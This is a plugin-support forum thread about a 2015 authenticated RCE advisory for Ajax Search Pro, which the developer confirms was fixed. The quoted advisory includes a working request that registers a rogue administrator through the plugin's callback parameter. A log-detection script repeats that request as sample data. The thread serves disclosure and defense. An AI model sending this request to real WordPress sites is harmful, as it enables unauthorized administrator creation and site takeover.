Authenticated RCE Vulnerability Logged Not Closed

This topic contains 3 replies, has 2 voices, and was last updated by Ernest Marcinko 6 years, 10 months ago.

  • #11068
    OddenCreative
    Participant

    I would like to get a status update regarding this potential exploit… I just purchased this Plugin and was starting to configure when I got an alert about a potential exploit.

    An Authentication RCE vulnerability was reported on this plugin

    ajax-search-pro 4.9.8 – 0 more info

    https://wpvulndb.com/plugins/ajax-search-pro

    https://wpvulndb.com/vulnerabilities/7859

    Ajax Search Pro – Authenticated RCE

    Description
    Affected versions unknown.

    Proof of Concept:

    This will register an administrator with username “xADMIN” and password “xPASS”:

    POST request to: /wp-admin/admin-ajax.php?page=ajax-search-pro/backend/settings.php&action=wpdreams-ajaxinput

    With POST data:
    wpdreams_callback=wp_insert_user&user_login=xADMIN&user_pass=xPASS&role=administrator

    Affects

    Plugin ajax-search-pro

    References

    PACKETSTORM 130955
    URL http://web.archive.org/web/20150619084745/http://research.evex.pw/?vuln=9

    Classification

    Type RCE
    OWASP Top 10 A1: Injection
    CWE CWE-94

    Miscellaneous

    Submitter A. Samman
    Submitter Twitter Evex_1337
    Views 350
    Verified No
    WPVDB ID 7859

    Timeline

    Publicly Published 2015-03-18 (over 1 year ago)
    Added 2015-03-21 (over 1 year ago)
    Last Updated 2016-04-24 (7 months ago)

    Copyright & License

    Copyright All data and resources contained within this page and this web site is Copyright © The WPScan Team.
    License Some of this data may be used for non-commercial purposes, however, any potential commercial usage of this data will require a license. If you would like to inquire about a commercial license please contact us.
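
    For anyone checking whether a site saw requests shaped like the one in the advisory quoted above, here is a log-review sketch. It is an added example, not code from this thread or from the plugin; the record layout (client IP, method, request URI, form body, as a WAF audit log might provide) and the sample records are constructed assumptions.

```python
from urllib.parse import urlsplit, parse_qs

# Constructed sample records: (client IP, method, request URI, form body).
SAMPLE_REQUESTS = [
    ("203.0.113.7", "POST",
     "/wp-admin/admin-ajax.php?page=ajax-search-pro/backend/settings.php"
     "&action=wpdreams-ajaxinput",
     "wpdreams_callback=wp_insert_user&user_login=xADMIN&user_pass=xPASS"
     "&role=administrator"),
    # action supplied in the body, parameter name percent-encoded
    ("203.0.113.7", "POST", "/wp-admin/admin-ajax.php",
     "action=wpdreams-ajaxinput&wpdreams%5Fcallback=wp_insert_user"),
    # unrelated AJAX action: must not be flagged
    ("198.51.100.4", "POST", "/wp-admin/admin-ajax.php",
     "action=heartbeat&interval=15"),
    # same action without a callback parameter: must not be flagged
    ("198.51.100.9", "GET",
     "/wp-admin/admin-ajax.php?action=wpdreams-ajaxinput", ""),
]

TARGET_PATH = "/wp-admin/admin-ajax.php"
TARGET_ACTION = "wpdreams-ajaxinput"
CALLBACK_PARAM = "wpdreams_callback"


def merged_params(uri, body):
    """Collect query-string and form-body parameters (decoded) in one dict.

    admin-ajax.php reads `action` from $_REQUEST, so it may arrive either way.
    """
    params = parse_qs(urlsplit(uri).query, keep_blank_values=True)
    for key, values in parse_qs(body, keep_blank_values=True).items():
        params.setdefault(key, []).extend(values)
    return params


def find_callback_requests(requests):
    """Return (ip, callback) for each request matching the advisory's pattern."""
    findings = []
    for ip, _method, uri, body in requests:
        if not urlsplit(uri).path.endswith(TARGET_PATH):
            continue  # endswith() also covers WordPress in a subdirectory
        params = merged_params(uri, body)
        if TARGET_ACTION not in params.get("action", []):
            continue
        for callback in params.get(CALLBACK_PARAM, []):
            findings.append((ip, callback))
    return findings


if __name__ == "__main__":
    print(find_callback_requests(SAMPLE_REQUESTS))
```

    Plain web-server access logs usually do not record POST bodies, so this needs a source that does.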

    #11069
    Ernest Marcinko
    Keymaster

    Hi,

    It was fixed a very long time ago; they messaged me before publishing the report, so a fix was released before that.

    Best,
    Ernest Marcinko

    If you like my products, don't forget to rate them on codecanyon :)


    #11086
    OddenCreative
    Participant

    Perhaps you can submit a note back to them so that they can mark it fixed, and close it. I know that if the next developer/admin comes along to check logs and sees that flagged, they will likely contact you, too.

    We run clean green on our servers. A vulnerability or exploit mark is typically grounds for removal, or we look to help fix them.

    Thanks for replying so quickly!

    #11088
    Ernest Marcinko
    Keymaster

    Hi!

    I’ve sent a message again, and they already marked it as resolved 🙂
    Thanks for notifying me, I thought this was done a long time ago.

    Best,
    Ernest Marcinko


